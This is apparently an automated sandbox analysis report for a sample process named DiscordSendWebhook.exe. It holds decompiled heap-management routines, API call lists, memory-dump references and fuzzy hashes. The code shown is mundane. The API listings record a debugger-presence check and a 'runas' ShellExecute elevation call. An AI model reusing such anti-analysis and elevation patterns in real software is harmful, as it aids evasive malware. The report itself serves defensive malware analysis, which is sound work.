				intOrPtr* _t88;
				intOrPtr* _t89;
				intOrPtr* _t90;
				intOrPtr* _t91;

				_t88 = _a4;
				_t87 = 0;
				_t91 = 0;
				if( *((intOrPtr*)(_t88 + 0x1c)) != 0) {
					EnterCriticalSection(_t88 + 0x20);
					_t87 = 0;
				}
				_t89 =  *((intOrPtr*)(_t88 + 4));
				if(_t89 == 0) {
					_t78 =  *(_t88 + 0xc) >> 0x00000004 & 0xfffffff0;
					if(_t78 >=  *(_t88 + 0x14)) {
						if(_t78 >  *(_t88 + 0x18)) {
							_t78 =  *(_t88 + 0x18);
						}
					} else {
						_t78 =  *(_t88 + 0x14);
					}
					_t90 = HeapAlloc( *0x417008, _t87,  *(_t88 + 0x10) * _t78 + 0x18);
					_t81 = 1;
					if(_t90 == 0) {
						_t90 = HeapAlloc( *0x417008, 0,  *(_t88 + 0x10) + 0x18);
						if(_t90 == 0) {
							_t87 = 0;
							goto L30;
						}
						_t81 = 1;
						 *(_t90 + 0xc) = 1;
						goto L23;
					} else {
						 *(_t90 + 0xc) = _t78;
						L23:
						_t87 = 0;
						 *(_t88 + 0xc) =  *(_t88 + 0xc) +  *(_t90 + 0xc);
						 *((intOrPtr*)(_t90 + 0x10)) = _t81;
						 *((intOrPtr*)(_t90 + 0x14)) = 0;
						 *((intOrPtr*)(_t90 + 8)) = 0;
						if( *(_t90 + 0xc) <= _t81) {
							 *_t90 =  *_t88;
							 *((intOrPtr*)(_t90 + 4)) = 0;
							 *_t88 = _t90;
						} else {
							 *_t90 =  *((intOrPtr*)(_t88 + 4));
							 *((intOrPtr*)(_t90 + 4)) = 0;
							 *((intOrPtr*)(_t88 + 4)) = _t90;
						}
						_t62 =  *_t90;
						if(_t62 != 0) {
							 *((intOrPtr*)(_t62 + 4)) = _t90;
						}
						_t46 = _t90 + 0x18; // 0x18
						_t91 = _t46;
						L30:
						goto L31;
					}
				} else {
					_t83 =  *((intOrPtr*)(_t89 + 0x14));
					if(_t83 <= 0) {
						_t84 =  *(_t89 + 0x10);
						_t91 = _t89 + 0x18 +  *(_t88 + 0x10) * _t84;
						_t13 = _t84 + 1; // 0x1
						 *(_t89 + 0x10) = _t13;
					} else {
						_t91 =  *((intOrPtr*)(_t89 + 8));
						 *((intOrPtr*)(_t89 + 8)) =  *_t91;
						_t8 = _t83 - 1; // -1
						 *((intOrPtr*)(_t89 + 0x14)) = _t8;
					}
					if( *((intOrPtr*)(_t89 + 0x14)) == _t87 &&  *(_t89 + 0x10) >=  *((intOrPtr*)(_t89 + 0xc))) {
						_t85 =  *_t89;
						if(_t85 != 0) {
							 *(_t85 + 4) =  *(_t89 + 4);
						}
						_t68 =  *_t89;
						if(_t89 !=  *((intOrPtr*)(_t88 + 4))) {
							 *( *(_t89 + 4)) = _t68;
						} else {
							 *((intOrPtr*)(_t88 + 4)) = _t68;
						}
						 *_t89 =  *_t88;
						 *(_t89 + 4) = _t87;
						 *_t88 = _t89;
						_t70 =  *_t89;
						if(_t70 != 0) {
							 *((intOrPtr*)(_t70 + 4)) = _t89;
						}
					}
					L31:
					if( *((intOrPtr*)(_t88 + 0x1c)) != _t87) {
						LeaveCriticalSection(_t88 + 0x20);
					}
					if(_t91 == 0) {
						return 0;
					} else {
						 *_t91 = _t90;
						_t49 =  &_a4; // 0x4
						return _t49;
					}
				}
			}

APIs

EnterCriticalSection.KERNEL32(?,?,?,00000000,0040A044,00000000,00000001,?,?,?,00000000,00409E6C,?,?,00000000,?), ref: 0040D533
HeapAlloc.KERNEL32(00000000,-00000018,00000001,?,?,00000000,0040A044,00000000,00000001,?,?,?,00000000,00409E6C,?,?), ref: 0040D5E8
HeapAlloc.KERNEL32(00000000,-00000018,?,?,00000000,0040A044,00000000,00000001,?,?,?,00000000,00409E6C,?,?,00000000), ref: 0040D60B
LeaveCriticalSection.KERNEL32(?,?,00000000,0040A044,00000000,00000001,?,?,?,00000000,00409E6C,?,?,00000000,?,?), ref: 0040D663

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocCriticalHeapSection$EnterLeave
String ID:
API String ID: 830345296-0
Opcode ID: 0f8299d0d3399f2ca5afc87431ff6ccb2b075c5558c85bef442be39d80f1af25
Instruction ID: c75203acf5dbc6b13cd53f4330a4279d02754d6c9a51f963ab4d277c9f4d2c3e
Opcode Fuzzy Hash: 0f8299d0d3399f2ca5afc87431ff6ccb2b075c5558c85bef442be39d80f1af25
Instruction Fuzzy Hash: 67510570900B02AFC324CF69D980922B7F4FF587147108A3EE8AA97A94D335F959CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040E0D0, Relevance: 5.1, APIs: 4, Instructions: 62
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040E0D0(void* __ecx, void** _a4, wchar_t* _a8) {
				int _v8;
				void* _t40;
				void* _t43;
				void* _t45;

				_v8 = 0;
				if(_a8 == 0) {
					if( *_a4 != 0) {
						_t40 =  *0x417720; // 0x2760000
						HeapFree(_t40, 0,  *_a4);
						 *_a4 = 0;
					}
				} else {
					_v8 = wcslen(_a8);
					if( *_a4 != 0) {
						_t12 = _v8 + 0xa; // 0xa
						_t43 =  *0x417720; // 0x2760000
						 *_a4 = HeapReAlloc(_t43, 0,  *_a4, _v8 + _t12);
					} else {
						_t8 = _v8 + 0xa; // 0xa
						_t45 =  *0x417720; // 0x2760000
						 *_a4 = HeapAlloc(_t45, 0, _v8 + _t8);
					}
					E0040E300(_a8,  *_a4, _a8, _v8);
				}
				return _v8 + _v8 + 2;
			}

APIs

wcslen.MSVCRT ref: 0040E0E5
HeapAlloc.KERNEL32(02760000,00000000,0000000A), ref: 0040E109
HeapReAlloc.KERNEL32(02760000,00000000,00000000,0000000A), ref: 0040E12D
HeapFree.KERNEL32(02760000,00000000,00000000,?,?,0040506F,?,0041602A,00401095,00000000), ref: 0040E164

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$Alloc$Freewcslen
String ID:
API String ID: 2479713791-0
Opcode ID: f5b77000bbf8e4bbffd1e92e25ea49c26a95bf6dea2a94c690576bfd34a48491
Instruction ID: 5c25edb19946727406606906c76980e1d10e687976c030b77a126e3da493f9c6
Opcode Fuzzy Hash: f5b77000bbf8e4bbffd1e92e25ea49c26a95bf6dea2a94c690576bfd34a48491
Instruction Fuzzy Hash: BD212774604209EFDB04CF94D884FAAB7BAFB48354F108569F9099F390D735EA41CB94

Uniqueness

Uniqueness Score: -1.00%

Function 0040D438, Relevance: 5.1, APIs: 4, Instructions: 56
memoryCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0040D438(long* _a4, signed int _a8) {
				long _t24;
				signed int _t27;
				struct _CRITICAL_SECTION* _t34;
				signed int _t38;
				long* _t39;
				intOrPtr _t40;

				_t39 = _a4;
				_t2 =  &(_t39[8]); // 0x20
				_t34 = _t2;
				EnterCriticalSection(_t34);
				_t38 = _a8;
				if(_t38 != 0xffffffff) {
					if(_t38 >= _t39[2]) {
						_t27 = _t39[1] + _t38;
						_t39[2] = _t27;
						_t39[3] = HeapReAlloc( *0x417008, 8, _t39[3], _t27 << 2);
					}
					if( *((intOrPtr*)(_t39[3] + _t38 * 4)) == 0) {
						 *((intOrPtr*)(_t39[3] + _t38 * 4)) = HeapAlloc( *0x417008, 8,  *_t39);
					} else {
						_t24 = _t39[5];
						if(_t24 != 0) {
							 *_t24(_t38);
						}
					}
					_t40 =  *((intOrPtr*)(_t39[3] + _t38 * 4));
				} else {
					_t4 =  &(_t39[4]); // 0x10
					_t40 = E0040DB12(_t4,  *_t39 + 8);
				}
				LeaveCriticalSection(_t34);
				return _t40;
			}

APIs

EnterCriticalSection.KERNEL32(00000020,00000000,?,00000000,0040AD75,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000), ref: 0040D443
HeapReAlloc.KERNEL32(00000008,?,?,?,00000000,0040AD75,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?), ref: 0040D483
LeaveCriticalSection.KERNEL32(00000020,?,00000000,0040AD75,00000000,?,?,00000000,004033A4,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0040D4BE

Part of subcall function 0040DB12: HeapAlloc.KERNEL32(00000008,00000000,0040D38C,00417608,00000014,?,?,?,?,00409614,00000010,00000000,00000000,00401071,00000000,00001000), ref: 0040DB1E

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocCriticalHeapSection$EnterLeave
String ID:
API String ID: 830345296-0
Opcode ID: be2f1553c835898b8f41ca660172eefbe6af4dd5fd6a89ea98a49a40f9a2ae85
Instruction ID: a304a92e3806a45bcf6d327fe86cdfb5e6d5534298f9acb62e815e22c79c963c
Opcode Fuzzy Hash: be2f1553c835898b8f41ca660172eefbe6af4dd5fd6a89ea98a49a40f9a2ae85
Instruction Fuzzy Hash: 30112B32604700AFC3208FA8EC40D56B7FAFF58765B15892AE996E36A0C734F804CB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040D67D, Relevance: 5.0, APIs: 4, Instructions: 44
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040D67D(void** _a4) {
				void* _t9;
				void* _t10;
				struct _CRITICAL_SECTION* _t11;
				void** _t15;
				void* _t16;
				void* _t17;

				_t15 = _a4;
				if(_t15[7] != 0) {
					_t3 =  &(_t15[8]); // 0x20
					EnterCriticalSection(_t3);
				}
				_t9 = _t15[1];
				if(_t9 != 0) {
					do {
						_t17 =  *_t9;
						HeapFree( *0x417008, 0, _t9);
						_t9 = _t17;
					} while (_t17 != 0);
				}
				_t10 =  *_t15;
				if(_t10 != 0) {
					do {
						_t16 =  *_t10;
						HeapFree( *0x417008, 0, _t10);
						_t10 = _t16;
					} while (_t16 != 0);
				}
				 *_t15 = 0;
				_t15[1] = 0;
				_t15[3] = 0;
				if(_t15[7] != 0) {
					_t8 =  &(_t15[8]); // 0x20
					_t11 = _t8;
					LeaveCriticalSection(_t11);
					return _t11;
				}
				return _t10;
			}

APIs

EnterCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040D95E,00000000,00000000,?,00409E88,?,00000000,00000200,?,?,00409D8F,00000200), ref: 0040D68F
HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040D95E,00000000,00000000,?,00409E88,?,00000000,00000200,?,?,00409D8F), ref: 0040D6A6
HeapFree.KERNEL32(00000000,?,?,00000000,00000200,0040D95E,00000000,00000000,?,00409E88,?,00000000,00000200,?,?,00409D8F), ref: 0040D6C2
LeaveCriticalSection.KERNEL32(00000020,?,00000000,00000200,0040D95E,00000000,00000000,?,00409E88,?,00000000,00000200,?,?,00409D8F,00000200), ref: 0040D6DF

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalFreeHeapSection$EnterLeave
String ID:
API String ID: 1298188129-0
Opcode ID: 53ceed24bb8d2d46dd7a9e67fb8799a8add0012f463c06b4e215cdce4978a367
Instruction ID: ccb09d183470463af25dc63fc94d1cebb037c249e32c06969674a21ae1653042
Opcode Fuzzy Hash: 53ceed24bb8d2d46dd7a9e67fb8799a8add0012f463c06b4e215cdce4978a367
Instruction Fuzzy Hash: BF017C75A0261AEFC7108F95E904967BBBCFF08750301843AE80897654C731E864CFE8

Uniqueness

Uniqueness Score: -1.00%

Function 00409E6F, Relevance: 5.0, APIs: 4, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E00409E6F(void* _a4) {
				void* __ebp;
				void* _t7;
				void* _t12;
				void* _t19;
				void* _t20;
				void* _t22;
				void* _t24;

				_t20 = _a4;
				_t27 = _t20;
				if(_t20 != 0) {
					_push(_t24);
					E0040A0BA(_t19, _t27, _t20);
					E0040D8E6(_t24,  *((intOrPtr*)(_t20 + 0x38)));
					HeapFree( *0x417008, 0,  *(_t20 + 4));
					HeapFree( *0x417008, 0,  *(_t20 + 0xc));
					_t12 =  *(_t20 + 0x34);
					if(_t12 == 0) {
						L5:
						 *((intOrPtr*)( *((intOrPtr*)(_t20 + 0x30)))) = 0;
						return HeapFree( *0x417008, 0, _t20);
					}
					do {
						_t22 =  *_t12;
						HeapFree( *0x417008, 0, _t12);
						_t12 = _t22;
					} while (_t22 != 0);
					goto L5;
				}
				return _t7;
			}

APIs

Part of subcall function 0040A0BA: memset.MSVCRT ref: 0040A122

Part of subcall function 0040D8E6: EnterCriticalSection.KERNEL32(0041761C,00000200,00000000,?,00409E88,?,00000000,00000200,?,?,00409D8F,00000200,?,?,?,004010C3), ref: 0040D8FA
Part of subcall function 0040D8E6: HeapFree.KERNEL32(00000000,?,?,00409E88,?,00000000,00000200,?,?,00409D8F,00000200,?,?,?,004010C3,00000004), ref: 0040D948
Part of subcall function 0040D8E6: LeaveCriticalSection.KERNEL32(0041761C,?,00409E88,?,00000000,00000200,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015), ref: 0040D94F

HeapFree.KERNEL32(00000000,?,?,00000000,00000200,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015,00000000), ref: 00409E9A
HeapFree.KERNEL32(00000000,?,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409EA6
HeapFree.KERNEL32(00000000,?,?,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200), ref: 00409EBA
HeapFree.KERNEL32(00000000,00000000,?,?,00409D8F,00000200,?,?,?,004010C3,00000004,00000015,00000000,00000200,00000200,FFFFFFF5), ref: 00409ED0

Memory Dump Source

Source File: 00000011.00000002.426008947.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000011.00000002.426001613.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426024616.0000000000412000.00000002.00020000.sdmp Download File
Associated: 00000011.00000002.426032524.0000000000416000.00000004.00020000.sdmp Download File
Associated: 00000011.00000002.426040172.0000000000418000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap$CriticalSection$EnterLeavememset
String ID:
API String ID: 4254243056-0
Opcode ID: 2e2b091367acf3d98793c74670de9e011cac5a97bd1a707a8857b69d5b2dd878
Instruction ID: bfb960cb52ae9f1737c5edf5dab89cb24d0a80b98fb865d44a1203debf2c4dae
Opcode Fuzzy Hash: 2e2b091367acf3d98793c74670de9e011cac5a97bd1a707a8857b69d5b2dd878
Instruction Fuzzy Hash: 40F0FF31205609BFC6126F5AED40D57BF7DFF5A7983464136B404626B0C732EC619AA8

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: DiscordSendWebhook.exe PID: 6260 Parent PID: 4180 DiscordSendWebhook.exeCOMMON

Executed Functions

Function 00143B4C, Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 153windowCOMMON

Download Yara Rule

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00143B7A
IsDebuggerPresent.KERNEL32 ref: 00143B8C
GetFullPathNameW.KERNEL32(00007FFF,?,?,002062F8,002062E0,?,?), ref: 00143BFD

Part of subcall function 00147D2C: _memmove.LIBCMT ref: 00147D66

Part of subcall function 00150A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00143C26,002062F8,?,?,?), ref: 00150ACE

SetCurrentDirectoryW.KERNEL32(?), ref: 00143C81
MessageBoxA.USER32 ref: 0017D4BC
SetCurrentDirectoryW.KERNEL32(?,002062F8,?,?,?), ref: 0017D4F4
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,001F5D40,002062F8,?,?,?), ref: 0017D57A
ShellExecuteW.SHELL32(00000000,?,?), ref: 0017D581

Part of subcall function 00143A58: GetSysColorBrush.USER32(0000000F), ref: 00143A62
Part of subcall function 00143A58: LoadCursorW.USER32(00000000,00007F00), ref: 00143A71
Part of subcall function 00143A58: LoadIconW.USER32(00000063), ref: 00143A88
Part of subcall function 00143A58: LoadIconW.USER32(000000A4), ref: 00143A9A
Part of subcall function 00143A58: LoadIconW.USER32(000000A2), ref: 00143AAC
Part of subcall function 00143A58: LoadImageW.USER32 ref: 00143AD2
Part of subcall function 00143A58: RegisterClassExW.USER32 ref: 00143B28

Part of subcall function 001439E7: CreateWindowExW.USER32 ref: 00143A15
Part of subcall function 001439E7: CreateWindowExW.USER32 ref: 00143A36
Part of subcall function 001439E7: ShowWindow.USER32(00000000,?,?), ref: 00143A4A
Part of subcall function 001439E7: ShowWindow.USER32(00000000,?,?), ref: 00143A53

Part of subcall function 001443DB: _memset.LIBCMT ref: 00144401
Part of subcall function 001443DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 001444A6

Strings

This is a third-party compiled AutoIt script., xrefs: 0017D4B4
runas, xrefs: 0017D575

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas
API String ID: 529118366-3287110873
Opcode ID: bc41df8f2f8916b50fceb09a46aa95e5f35ebd24d2edc5c1854f98ec7e422bfa
Instruction ID: d410ef53939f6ee2a76991cec09c0eadc4433b2ac285dfdadf62648c1fbba2a0
Opcode Fuzzy Hash: bc41df8f2f8916b50fceb09a46aa95e5f35ebd24d2edc5c1854f98ec7e422bfa
Instruction Fuzzy Hash: 7C51F530904349AFCF11ABF4EC49EFD7B79AF55700B044169F865A21F2DB709656CB21

Uniqueness

Uniqueness Score: -1.00%

Function 00144AFE, Relevance: 10.7, APIs: 7, Instructions: 223COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 00144B2B

Part of subcall function 00147D2C: _memmove.LIBCMT ref: 00147D66

GetCurrentProcess.KERNEL32(?,001CFAEC,00000000,00000000,?), ref: 00144BF8
IsWow64Process.KERNEL32(00000000), ref: 00144BFF
GetNativeSystemInfo.KERNEL32(00000000), ref: 00144C45
FreeLibrary.KERNEL32(00000000), ref: 00144C50
GetSystemInfo.KERNEL32(00000000), ref: 00144C81
GetSystemInfo.KERNEL32(00000000), ref: 00144C8D

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
String ID:
API String ID: 1986165174-0
Opcode ID: 9aaa6954283b27d086ca2e2e9406a03fd3a8294566843cb5c6b8470b50453044
Instruction ID: a830e56a5a5826339848124468141a9dc6bb59db4bcd742f735bf4385d672dca
Opcode Fuzzy Hash: 9aaa6954283b27d086ca2e2e9406a03fd3a8294566843cb5c6b8470b50453044
Instruction Fuzzy Hash: D891023154A7C4DFC731CB6894A16AABFF5AF2A300B48899ED0CA83A11D321E948C719

Uniqueness

Uniqueness Score: -1.00%

Function 0019DA5D, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0019DAC5
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0019DAFB
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0019DB0C
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0019DB8E

Strings

DllGetClassObject, xrefs: 0019DB01

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: 35d228a4f639252d916916f578d629a0d9f95407ff57426d4307e9d37633c6cb
Instruction ID: 826a4551fd27f9cb643e905c12451f238a478ff6febbd7e9aaf2c30641f04117
Opcode Fuzzy Hash: 35d228a4f639252d916916f578d629a0d9f95407ff57426d4307e9d37633c6cb
Instruction Fuzzy Hash: B94160B1600208EFDF15CF65D885AAA7BB9EF45350F1680AEED069F205D7B1DD44CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0014FE40, Relevance: 8.0, APIs: 3, Strings: 1, Instructions: 1040COMMON

Download Yara Rule

Strings

pr , xrefs: 00184DE3

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: BuffCharUpper
String ID: pr
API String ID: 3964851224-2379713278
Opcode ID: 618b28d6b78c6074f81105f55201502eb7f2eb63cca889521354f8de2666bb6e
Instruction ID: 129211bb64f53bc46683b14408b420855ac7514a14db0bf96fb80d0ca7d1f842
Opcode Fuzzy Hash: 618b28d6b78c6074f81105f55201502eb7f2eb63cca889521354f8de2666bb6e
Instruction Fuzzy Hash: 44925674608341CFD725DF58C480B2AB7E1BF98304F15896DE89A8B362DB71ED49CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00150B30, Relevance: 64.3, APIs: 27, Strings: 9, Instructions: 1300windowsleeptimeCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32 ref: 00150BBB
timeGetTime.WINMM ref: 00150E76
PeekMessageW.USER32 ref: 00150FB3
TranslateMessage.USER32(?), ref: 00150FC7
DispatchMessageW.USER32 ref: 00150FD5
Sleep.KERNEL32(0000000A), ref: 00150FDF
LockWindowUpdate.USER32(00000000,?,?), ref: 0015105A
DestroyWindow.USER32 ref: 00151066
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00151080
Sleep.KERNEL32(0000000A,?,?), ref: 001852AD
TranslateMessage.USER32(?), ref: 0018608A
DispatchMessageW.USER32 ref: 00186098
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 001860AC

Strings

@TRAY_ID, xrefs: 00185BB9
pr , xrefs: 0018542D
@GUI_WINHANDLE, xrefs: 001853B9
pr , xrefs: 00185383
@GUI_CTRLID, xrefs: 00185364
pr , xrefs: 001853D8
@GUI_CTRLHANDLE, xrefs: 0018540E
@COM_EVENTOBJ, xrefs: 0018591A
pr , xrefs: 00185BDE

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pr $pr $pr $pr
API String ID: 4003667617-2119928952
Opcode ID: b2efd043e001aad9ee123dc59986ea1489301c66fd478760fdbdbe64587cb02a
Instruction ID: 4635fd79012f9bccf10196cd7fcdc641eae468e1527f4569e3d76f8cfb80b5c2
Opcode Fuzzy Hash: b2efd043e001aad9ee123dc59986ea1489301c66fd478760fdbdbe64587cb02a
Instruction Fuzzy Hash: 4EB2B170608741DFD729DF24C885BAABBE6FF94304F14491DE8998B2A1DB70E949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00143015, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 73windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32(0000000F), ref: 00143074
RegisterClassExW.USER32 ref: 0014309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001430AF
InitCommonControlsEx.COMCTL32(?), ref: 001430CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001430DC
LoadIconW.USER32(000000A9), ref: 001430F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00143101

Strings

+, xrefs: 0014305D
TaskbarCreated, xrefs: 001430A4
AutoIt v3 GUI, xrefs: 00143090
0, xrefs: 00143056

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: a216aaf64e4f487187b88f628d83e89abcf4076c6187f0e1691214382d19b9e2
Instruction ID: 2b02bd1736cfce650e8fd8b3defc56be2c44cd9c1918d34e502c9150f140b2b7
Opcode Fuzzy Hash: a216aaf64e4f487187b88f628d83e89abcf4076c6187f0e1691214382d19b9e2
Instruction Fuzzy Hash: 943158B1804309EFEB408FA4EC89AC9BFF1FB09310F10812EF550A62A1D7B545A6CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00143041, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 54windowregistryCOMMON

Download Yara Rule

APIs

GetSysColorBrush.USER32(0000000F), ref: 00143074
RegisterClassExW.USER32 ref: 0014309E
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 001430AF
InitCommonControlsEx.COMCTL32(?), ref: 001430CC
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 001430DC
LoadIconW.USER32(000000A9), ref: 001430F2
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00143101

Strings

+, xrefs: 0014305D
TaskbarCreated, xrefs: 001430A4
AutoIt v3 GUI, xrefs: 00143090
0, xrefs: 00143056

Memory Dump Source

Source File: 00000022.00000002.250434598.0000000000141000.00000020.00020000.sdmp, Offset: 00140000, based on PE: true

Associated: 00000022.00000002.250427240.0000000000140000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250504789.00000000001CF000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250523725.00000000001F5000.00000002.00020000.sdmp Download File
Associated: 00000022.00000002.250532474.00000000001FF000.00000004.00020000.sdmp Download File
Associated: 00000022.00000002.250539797.0000000000208000.00000002.00020000.sdmp Download File

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
